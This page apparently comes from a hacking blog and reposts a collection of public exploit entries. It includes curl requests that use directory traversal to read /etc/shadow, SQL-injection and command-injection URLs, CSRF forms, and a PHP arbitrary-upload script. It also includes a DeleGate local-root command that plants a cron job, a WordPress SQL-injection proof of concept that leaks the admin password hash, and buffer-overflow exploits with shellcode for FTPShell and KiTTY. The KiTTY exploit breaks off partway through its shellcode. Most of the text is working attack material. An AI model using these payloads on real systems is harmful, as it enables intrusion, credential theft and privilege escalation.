Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863581403

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

source: https://www.securityfocus.com/bid/66817/info
 
Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities.
 
A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information.
 
Xangati XSR prior to 11 and XNR prior to 7 are vulnerable. 

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \
'hxxps://www.example.com/servlet/Installer'
            
source: https://www.securityfocus.com/bid/66817/info

Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities.

A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information.

Xangati XSR prior to 11 and XNR prior to 7 are vulnerable. 

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=foo&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../../../etc/shadow' \
'hxxps://www.example.com/servlet/MGConfigData'

POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=download&download=%2Ffloodguard%2Fdata%2F../../../../../../etc/shadow&updLaterThan=0&head=0&start=0&limit=4950&remote=www.example.com

POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=port_svc&download=%2Ffloodguard%2Fdata%2F../../../../../../../etc/shadow&updLaterThan=0&remote=www.example.com

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&binfile=%2Fourlogs%2F../../../../../../../../../etc/shadow' \
'hxxps://www.example.com/servlet/MGConfigData'
            
source: https://www.securityfocus.com/bid/66769/info

eazyCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?tab=[SQLI] 
            
source: https://www.securityfocus.com/bid/66708/info

Inneradmission component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_inneradmission&id=1'a 
            
source: https://www.securityfocus.com/bid/66677/info

PHPFox is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization.

Attackers can leverage this issue to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks.

PHPFox 3.7.3, 3.7.4 and 3.7.5 are vulnerable 

&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7
&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0 val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!& core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290 
            
source: https://www.securityfocus.com/bid/66593/info

ICOMM 610 is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.

ICOMM 610 01.01.08.991 and prior are vulnerable. 

<html>
  <!-- CSRF PoC --->
  <body>
    <form action="http://www.example.com/cgi-bin/sysconf.cgi?page=personalize_password.asp&sid=rjPd8QVqvRGX×tamp=1396366701157" method="POST">
      <input type="hidden" name="PasswdEnable" value="on" />
      <input type="hidden" name="New_Passwd" value="test" />
      <input type="hidden" name="Confirm_New_Passwd" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
            
source: https://www.securityfocus.com/bid/66549/info

Primo Interactive CMS is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.

An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.

Primo Interactive CMS 6.2 is vulnerable; other versions may also be affected. 

http://www.example.com/cgi-bin/pcm.cgi?download=;id| 
            
source: https://www.securityfocus.com/bid/66536/info

Symphony is prone to a cross-site request-forgery vulnerability.

An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.

Symphony version 2.3.1 and prior are vulnerable. 

<img src="http://www.example.com/symphony/system/authors/?order=asc&sort=id%20INTO%20OUTFILE%20%27/var/www/file.txt%27%20--%20"> 
            
source: https://www.securityfocus.com/bid/66490/info

The Felici theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible.

Felici 1.7 is vulnerable; other versions may also be affected. 

<?php
$uploadfile="cafc.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/plugins/custom-background/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
            
Title: Local root vulnerability in DeleGate v9.9.13
Author: Larry W. Cashdollar, @_larry0
Date: 2015-12-17
Advisory: http://www.vapidlabs.com/advisory.php?v=159
Download Sites: http://delegate.hpcc.jp/delegate/ 
                              http://delegate.org/delegate/
Vendor: National Institute of Advanced Industrial Science and Technology
Vendor Notified: 2015-12-17
Vendor Contact: y.sato@delegate.org ysato@etl.go.jp
Description: DeleGate is a multipurpose proxy server which relays various application protocols on TCP/IP or UDP/IP, including HTTP, FTP, Telnet, NNTP, SMTP, POP, IMAP, LPR, LDAP, ICP, DNS, SSL, Socks, and more. DeleGate mediates communication between servers and clients where direct communication is impossible, inefficient, or inconvenient.

Vulnerability:
Installation of delegate 9.9.13 sets some binaries setuid root, at least one of these binaries can be used to escalate the privileges of a local user.  The binary dgcpnod creates a node allowing a local unprivileged user to create files anywhere on disk.   By creating a file in /etc/cron.hourly a local user can execute commands as root.

Installation of software via source or binary distribution with option to not run as root results in a script set-subin.sh to run setting the setuid bit on four binaries.  In Linux distributions where this software is part of the package list these binaries are not setuid root. (archlinux)

From documentation http://www.delegate.org/delegate/newbies-ja.shtml (translated to english):
Go is included in the binary distribution, or DGROOT that you can build from the source to the location of preference, and then change the name if necessary. This is the DgRoot. In addition, if needed, you can rename the executable file of DeleGate to the name of the preference. This is the DgExe.
"In Unix version subin in if you want to use "(such as when using a privileged port), do the following.

  (3-2uk) $ cd DgRoot / subin
          $ Sh setup-subin.sh

larry@f4ult:~/dg9_9_13/DGROOT/subin$ ls -l
total 1916
-r-sr-s--- 1 root  larry 384114 Oct 31  2014 dgbind
-r-sr-s--- 1 root  larry 384598 Oct 31  2014 dgchroot
-r-sr-s--- 1 root  larry 384161 Oct 31  2014 dgcpnod
-rwxr-xr-x 1 larry larry 384114 Oct 31  2014 dgdate
-rwxr-xr-x 1 larry larry  29066 Oct 31  2014 dgforkpty
-r-sr-s--- 1 root  larry 384113 Oct 31  2014 dgpam
-rwxr-x--- 1 larry larry    272 Oct 27  2014 setup-subin.sh

This script sets the setuid bit on four binaries:

larry@f4ult:~/dg9_9_13/DGROOT/subin$ cat setup-subin.sh
#!/bin/sh

SUBINS="dgpam dgbind dgchroot dgcpnod"
sudo sh -c "chown root $SUBINS; chmod 6550 $SUBINS"
if [ $? != 0 ]; then
  su root -c "chown root $SUBINS; chmod 6550 $SUBINS"
fi

CVEID: 2015-7556


Exploit Code:
$ touch /tmp/rootme; chmod +x /tmp/rootme; ./dgcpnod /tmp/rootme /etc/cron.hourly/rootme; echo -e '#!/bin/bash \n chmod 777 /etc/shadow' > /etc/cron.hourly/rootme 
            
/*
# Exploit Title: Simple Ads Manager 2.9.4.116 SQL Injection
# Date: 30-12-2015
# Software Link: https://wordpress.org/plugins/simple-ads-manager/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
 
1. Description

$whereClause and $whereClauseT and $whereClauseW and $whereClause2W are not escaped.

File: simple-ads-manager\ad.class.php

$aSql = "
	(SELECT
	  @pid := sp.id AS pid,
	  0 AS aid,
	  sp.name,
	  sp.patch_source AS code_mode,
	  @code_before := sp.code_before AS code_before,
	  @code_after := sp.code_after AS code_after,
	  @ad_size := IF(sp.place_size = \"custom\", CONCAT(CAST(sp.place_custom_width AS CHAR), \"x\", CAST(sp.place_custom_height AS CHAR)), sp.place_size) AS ad_size,
	  sp.patch_code AS ad_code,
	  sp.patch_img AS ad_img,
	  \"\" AS ad_alt,
	  0 AS ad_no,
	  sp.patch_link AS ad_target,
	  0 AS ad_swf,
	  \"\" AS ad_swf_flashvars,
	  \"\" AS ad_swf_params,
	  \"\" AS ad_swf_attributes,
	  \"\" AS ad_swf_fallback,
	  sp.patch_adserver AS ad_adserver,
	  sp.patch_dfp AS ad_dfp,
	  0 AS count_clicks,
	  0 AS code_type,
	  IF((sp.patch_source = 1 AND sp.patch_adserver) OR sp.patch_source = 2, -1, 1) AS ad_cycle,
	  @aca := IFNULL((SELECT AVG(sa.ad_weight_hits*10/(sa.ad_weight*$cycle)) FROM $aTable sa WHERE sa.pid = @pid AND sa.trash IS NOT TRUE AND {$whereClause} {$whereClauseT} {$whereClause2W}), 0) AS aca
	FROM {$pTable} sp
	WHERE {$pId} AND sp.trash IS FALSE)
	UNION
	(SELECT
	  sa.pid,
	  sa.id AS aid,
	  sa.name,
	  sa.code_mode,
	  @code_before AS code_before,
	  @code_after AS code_after,
	  @ad_size AS ad_size,
	  sa.ad_code,
	  sa.ad_img,
	  sa.ad_alt,
	  sa.ad_no,
	  sa.ad_target,
	  sa.ad_swf,
	  sa.ad_swf_flashvars,
	  sa.ad_swf_params,
	  sa.ad_swf_attributes,
	  sa.ad_swf_fallback,
	  0 AS ad_adserver,
	  0 AS ad_dfp,
	  sa.count_clicks,
	  sa.code_type,
	  IF(sa.ad_weight, (sa.ad_weight_hits*10/(sa.ad_weight*$cycle)), 0) AS ad_cycle,
	  @aca AS aca
	FROM {$aTable} sa
	WHERE sa.pid = @pid AND sa.trash IS FALSE AND {$whereClause} {$whereClauseT} {$whereClauseW})
	ORDER BY ad_cycle
	LIMIT 1;";

http://security.szurek.pl/simple-ads-manager-294116-sql-injection.html

2. Proof of Concept
*/

<?php
$out = array();
$out['WC'] = '1=0';
$out['WCT'] = '';
$out['WCW'] = ') UNION (SELECT user_pass, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2 FROM wp_users WHERE ID = 1';
$out['WC2W'] = '';
?>
<form method="post" action="http://wp-url/wp-content/plugins/simple-ads-manager/sam-ajax-loader.php">
<input type="hidden" name="action" value="load_place">
<input type="hidden" name="id" value="0">
<input type="hidden" name="pid" value="1">
<input type="text" name="wc" value="<?php echo base64_encode(serialize($out)); ?>">
<input type="submit" value="Send">
</form>

/*
Administrator password will be here:

{"success":true,"ad":"<div id='c2077_1_%here_is_password%' class='sam-container sam-place' data-sam='0'><\/div>","id":"1","pid":"%here_is_password%","cid":"c2077_1_%here_is_password%"}

3. Solution:
   
Update to version 2.9.5.118
*/
            
'''
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/FTPSHELL-v5.24-BUFFER-OVERFLOW.txt


Vendor:
================================
www.ftpshell.com


Product:
================================
FTPShell Client version 5.24

FTPShell client is a windows file transfer program that enables users to
reliably transfer files,
upload to websites, and download updates from the internet.


Vulnerability Type:
===================
Buffer Overflow


CVE Reference:
==============
N/A


Vulnerability Details:
=====================
ftpshell.exe client has a buffer overflow entry point in the 'Address'
input field used to connect to an FTP server.
Allowing local arbitrary code execution by overwriting several registers on
the stack and controlling program execution flow.
EIP register will be used to jump to our malicious shellcode which will be
patiently waiting in ECX register.

exploited registers dump...

EAX 00000021
ECX 0012E5B0
EDX 76F670B4 ntdll.KiFastSystemCallRet
EBX 76244FC4 kernel32.76244FC4
ESP 0012E658 ASCII "calc.exe"   <--------- BAM!
EBP 7621E5FD kernel32.WinExec
ESI 001D2930
EDI 76244FEC kernel32.76244FEC
EIP 015FB945
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00200246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
               3 2 1 0      E S P U O Z D I
FST C5E1  Cond 1 1 0 1  Err 1 1 1 0 0 0 0 1  (Unordered)
FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0


test stack dump....

(3b8.fa0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for ftpshell.exe
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
ftpshell.exe -
eax=41414141 ebx=017ebc70 ecx=017ebc70 edx=0012ebc8 esi=0012ebc8
edi=017a9498
eip=41414141 esp=0012e928 ebp=0012ea70 iopl=0         nv up ei pl nz na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00210202
41414141 ??              ???


Exploit code(s):
===============
'''

import struct

#FTPShell Client version 5.24 - www.ftpshell.com
#Buffer Overflow Exploit
#by hyp3rlinx
#run to generate payload, then copy and inject
#into the 'Address' field on the client and BOOM!

#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


#payload="A"*2475+"R"*4+"\xcc"*100  #<---- control EIP register

#find appropriate assembly instruction to call our payload JMP or CALL ECX.
#!mona jmp -r ecx -m kernel32.dll

eip=struct.pack('<L', 0x761C1FDC)    #jmp ecx kernel32.dll
payload="A"*2475+eip+sc              #<----- direct EIP overwrite no NOPs
no nothing... BOOOOOM!!!

file=open("C:\\ftpshell-exploit","w")
file.write(payload)
file.close()


'''
Disclosure Timeline:
========================================
Vendor Notification:  NR
December 29, 2015  : Public Disclosure



Exploitation Technique:
=======================
Local



Severity Level:
================
High



Description:
==========================================================


Request Method(s):              [+]  Local Injection


Vulnerable Product:             [+]  FTPShell Client version 5.24


Vulnerable Parameter(s):        [+] 'Address'



===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
'''
            
source: https://www.securityfocus.com/bid/66489/info

Beheer Systeem is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.

An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.

Beheer Systeem 6.1 is vulnerable; other versions may also be affected. 

http://www.example.com/!/pbs.cgi?download=;id| 
            
source: https://www.securityfocus.com/bid/66487/info

DotItYourself is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.

An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.

DotItYourself 6.11.060830 is vulnerable; other versions may also be affected. 

http://www.example.com/cade/dot-it-yourself.cgi?download=;id| 
            
source: https://www.securityfocus.com/bid/66401/info

qEngine is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input before being used to include files.

An attacker can exploit this issue using directory-traversal strings to view files and execute local script code in the context of the web server process. This may allow the attacker to compromise the application; other attacks are also possible.

qEngine 6.0.0 and 4.1.6 are vulnerable; other versions may also be affected. 

http://www.example.com/qe6_0/admin/task.php?run=../../../../../../windows/win.ini 
            
source: https://www.securityfocus.com/bid/66377/info

Jorjweb is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/ajedrez47/Paginas/info_torneo.php?id=3852'[REMOTE SQL-INJECTION WEB VULNERABILITY!]-- 
            
source: https://www.securityfocus.com/bid/66367/info

innoEDIT is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.

An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.

innoEDIT 6.2 is vulnerable; other versions may also be affected. 

http://www.example.com/innoedit/innoedit.cgi?download=;id| 
            
source: https://www.securityfocus.com/bid/66350/info

BIGACE Web CMS is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker can exploit these vulnerabilities to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, use directory-traversal strings to execute local script code in the context of the application, or obtain sensitive information that may aid in further attacks.

BIGACE Web CMS 2.7.5 is vulnerable; other versions may also be affected. 

http://www.example.com/bigace_2.7.5/bigace_install_2.7.5/public/index.php?menu=3&LANGUAGE=[LFI] 
            
source: https://www.securityfocus.com/bid/66343/info

Kaspersky Internet Security is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to exhaust available CPU and memory resources and make the affected application unresponsive, denying service to legitimate users.

Kaspersky Internet Security 14.0.0.4651 is vulnerable; other versions may also be affected. 

<HTML> <HEAD> <TITLE>RegExp Resource Exhaustion </TITLE> </HEAD> <BODY BGCOLOR="#FFFFFF"> <SCRIPT type="text/javascript"> var patt1=new RegExp("(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(. *(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(. *(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).* )+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).* )+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).* )+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).* )+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+)"); document.write(patt1.exec("peace")); </SCRIPT> </BODY> </HTML> 
            
source: https://www.securityfocus.com/bid/66317/info

MeiuPic is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible.

MeiuPic 2.1.2 is vulnerable; other versions may also be affected. 

http://www.example.com/MeiuPic/?ctl=../../../../../../../../../../etc/passwd 
            
# Exploit Title: KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)
# Date: 28/12/2015
# Exploit Author: Guillaume Kaddouch
# 	Twitter: @gkweb76
#	Blog: http://networkfilter.blogspot.com 
#	GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://www.9bis.net/kitty/
# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe
# Version: 0.65.0.2p
# Tested on: Windows 8.1 Pro x64 (FR), Windows 10 Pro x64 (FR)
# Category: Local

"""
Disclosure Timeline:
--------------------
2015-09-18: Vulnerability discovered
2015-09-26: Vendor contacted
2015-09-28: Vendor answer
2015-10-09: KiTTY 0.65.0.3p released : unintentionally (vendor said) preventing exploit from working, without fixing the core vulnerability
2015-10-20: KiTTY 0.65.1.1p released, vendor fix, but app can still be crashed using same vulnerability on another kitty.ini parameter
2015-11-15: KiTTY 0.66.6.1p released, seems fixed
2015-12-28: exploit published

Description :
-------------
A local overflow exists in kitty.ini file used by KiTTY portable. By writing a 1048 bytes string into 
the kitty.ini file, an overflow occurs that makes Kitty crashing. At time of the crash, EIP is 
overwritten at offset 1036. As all DLLs are ALSR and DEP protected, and rebased, we can only use 
kitty_portable.exe addresses, which start with a NULL. Successful exploitation will allow to execute
local executables on Windows 8.1 and Windows 10.

Win8.1 -> Code Execution
Win10  -> Code Execution

Instructions:
-------------
- Run exploit
- Launch KiTTY

Exploitation:
-------------
As EDX register points to our buffer, it seems like using a return address pointing to a 
JMP EDX instruction would do the trick. However this is not the case, because of the address containing
a NULL byte, our 1048 bytes buffer is truncated to 1039 bytes, and an access violation occurs before EIP could be
overwritten:

EAX = 00000041
00533DA2     0000           ADD BYTE PTR DS:[EAX],AL <---- Access violation when writing to [EAX]
00533DA4     00             DB 00

Increasing our initial buffer by 4 bytes (1052 bytes) gives us another crash,
but neither EIP nor SEH are overwritten. We end up with another memory access violation, which although looking
like a deadend, is in fact exploitable:

ECX and EBX points to our buffer
EDX and EDI are overwritten by our buffer

EDI = 41414141
764F8DD2   8917             MOV DWORD PTR DS:[EDI],EDX <---- Access violation when writing to [EDI]

Although we do not have control over the execution flow (EIP), we have at least control of the value written to EDI
at offset 1048. We can write a valid memory address into EDI, allowing the program to continue 
its execution. One such address is the address ESP points to on the stack: 0x0028C4F8.
Let's take a closer look to the code executed:


764F8DB8   BA FFFEFE7E      MOV EDX,7EFEFEFF			<-------- (3) JMP back here
764F8DBD   8B01             MOV EAX,DWORD PTR DS:[ECX]
764F8DBF   03D0             ADD EDX,EAX
764F8DC1   83F0 FF          XOR EAX,FFFFFFFF
764F8DC4   33C2             XOR EAX,EDX
764F8DC6   8B11             MOV EDX,DWORD PTR DS:[ECX]
764F8DC8   83C1 04          ADD ECX,4
764F8DCB   A9 00010181      TEST EAX,81010100
764F8DD0   75 07            JNZ SHORT msvcrt.764F8DD9

764F8DD2   8917             MOV DWORD PTR DS:[EDI],EDX  <------- (1) We start HERE
764F8DD4   83C7 04          ADD EDI,4
764F8DD7   EB DF            JMP SHORT msvcrt.764F8DB8   <------- (2) jump back above

1) Value from EDX is copied to the stack where EDI points to, then EDI is incremented and points to next address
2) The execution jumps back at the beginning of the code block, overwrites our source register EDX with 7EFEFEFF,
overwrites EAX with 41414141 (ECX point to our buffer), restore EDX with 41414141, increment ECX pointing to our
buffer by 4, pointing to our next buffer value, and starting all over again. Also there is a very interesting instruction 
following this code:

764F8DD2   8917             MOV DWORD PTR DS:[EDI],EDX    <------- We are HERE
764F8DD4   83C7 04          ADD EDI,4
764F8DD7   EB DF            JMP SHORT msvcrt.764F8DB8
764F8DD9   84D2             TEST DL,DL
764F8DDB   74 32            JE SHORT msvcrt.764F8E0F
764F8DDD   84F6             TEST DH,DH
764F8DDF   74 15            JE SHORT msvcrt.764F8DF6
764F8DE1   F7C2 0000FF00    TEST EDX,0FF0000
764F8DE7   75 16            JNZ SHORT msvcrt.764F8DFF
764F8DE9   66:8917          MOV WORD PTR DS:[EDI],DX
764F8DEC   8B4424 08        MOV EAX,DWORD PTR SS:[ESP+8]
764F8DF0   C647 02 00       MOV BYTE PTR DS:[EDI+2],0
764F8DF4   5F               POP EDI
764F8DF5   C3               RETN							<------- We want that!

This code block happily copies our entire buffer chunk by chunk to the stack, and is later followed by a RET instruction.
If there could be a way to copy our buffer on the stack and make ESP pointing to a predictable part or our buffer, the RET would
give us the control of the execution flow.

When the copy operation is finished, the code crashes again and this time EIP is overwritten with 41414141, and ESP
has the address 0x0028C500 pointing toward the near begining of our buffer (offset 8). The RET has been reached, wonderful :-)

However, we cannot write a usable address here to jump somewhere else as a NULL byte would truncate our entire buffer and no 
crash would occur... The goal here would be to find the correct address to put into EDI so that ESP will point to the end
of our buffer, where we will be able to use another address, containing a NULL, to jump somewhere else and
take back control of the execution flow. However our buffer is already terminated by a NULL byte address for EDI.

1) We cannot make ESP points anywhere in the middle of our buffer, as we can only use addresses containing a NULL
2) We cannot add another valid NULL containing address at the end of our buffer, as a stack address containing a NULL is there 
for EDI
3) EDI contains an address already pointing to the start of our buffer, thanks to the copy operation, our only chance is to try
to make ESP pointing to it when the crash happens.

After testing by incrementing or decrementing EDI address value, it appears ESP always point to 0x0028C500 at time 
of the crash. This means we can calculate the correct offset to align EDI address with ESP, just before the RET happens to make 
EIP following that address. The EDI address to achieve that is: (EIP)0x0028C500 - (buffer length)1052 = 0x0028C0E4. 
As our buffer is copied onto a NULLs filled zone, we can omit the NULL byte and set EDI to '\xE4\xC0\x28'.

To sume it up:
1) First crash with EIP overwritten seems not exploitable
2) Second crash does not have EIP nor SEH overwritten (memory access violation), we only have "control" over some registers
3) Tweaking values of EDX and EDI, makes the program continue execution and copying our buffer onto the stack
4) The RET instruction is reached and execution crashes again
5) We find an EDI address value which is valid for a) copying our buffer on stack, b) is aligning itself with ESP at the correct
offset and c) will appear on the stack and be used by the RET instruction, giving us finally control over the execution flow.

That is like being forbidden to enter a building, but we give two bags (EDI + EDX) to someone authorized who enters the building,
who do all the work for us inside, and goes out back to us with the vault key (EIP).
"""

import sys

if len(sys.argv) == 1:
	print "\nUsage: kitty_ini_8_10.py <win8.1|win10>"
	print "Example: kitty_ini_8_10.py win8.1"
	sys.exit()

os = sys.argv[1] # Windows version to target

# Metasploit WinExec shellcode (calc.exe)
# Encoder: x86/alpha_mixed
# Bad chars: \x00\x0a\x0d\x21\x11\x1a\x01\x31
# Size: 448 bytes
shellcode = (
"\x89\xe6\xdd\xc7\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x69\x6c\x39\x78\x6f\x72\x57\x70\x77\x70\x65\x50\x55\x30\x6c"
"\x49\x39\x75\x66\x51\x4f\x30\x65\x34\x4e\x6b\x70\x50\x56\x50"
"\x4c\x4b\x70\x52\x36\x6c\x6e\x6b\x50\x52\x76\x74\x4c\x4b\x74"
"\x32\x64\x68\x76\x6f\x48\x37\x50\x4a\x77\x56\x55\x61\x69\x6f"
"\x6c\x6c\x45\x6c\x33\x51\x33\x4c\x35\x52\x34\x6c\x61\x30\x6b"
"\x71\x38\x4f\x34\x4d\x76\x61\x5a\x67\x4b\x52\x38\x72\x63\x62"
"\x52\x77\x4e\x6b\x76\x32\x46\x70\x4e\x6b\x32\x6a\x47\x4c\x4e"
"\x6b\x50\x4c\x54\x51\x52\x58\x38\x63\x70\x48\x35\x51\x58\x51"
"\x30\x51\x6c\x4b\x61\x49\x57\x50\x37\x71\x5a\x73\x6c\x4b\x30"
"\x49\x56\x78\x39\x73\x66\x5a\x52\x69\x6c\x4b\x57\x44\x6e\x6b"
"\x57\x71\x6b\x66\x34\x71\x4b\x4f\x6e\x4c\x59\x51\x48\x4f\x64"
